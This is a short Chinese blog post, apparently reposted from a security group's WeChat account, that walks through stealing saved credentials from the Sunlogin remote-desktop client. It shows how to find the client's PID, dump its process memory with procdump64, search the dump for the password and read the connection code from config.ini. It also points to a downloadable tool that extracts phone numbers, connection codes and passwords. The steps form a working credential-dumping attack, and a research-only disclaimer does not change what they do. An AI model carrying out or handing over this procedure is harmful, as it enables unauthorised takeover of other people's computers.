0x01 🌟 前言
向日葵 密码读取教程+工具
0x02 🔍 读取PID
tasklist | find /I "SunloginClient.exe"
此时会出现两个程序,请找到非 Services 的 PID。
使用 procdump64.exe,通过 cmd 输入以下命令:
procdump64.exe -accepteula -ma 你的PID
你将得到一个类似 SunloginClient.exe_240909_163416.dmp 的文件。
0x03 🛠 手动提取
使用 010Editor 打开 dmp 文件并手动查找:
搜索password即可 连接码在配置文件里config.ini
0x04 💻 软件提取
为了方便,我编写了一个工具,公众号发送"向日葵密码"获取工具选择文件即可自动提取。
提取内容包括:手机号、连接码、连接密码。
通过工具选择dmp文件后,即可输出所需信息
下载 :链接:https://pan.quark.cn/s/482b6cb8da0f
原文始发于微信公众号(哈拉少安全小队):向日葵密码读取+工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论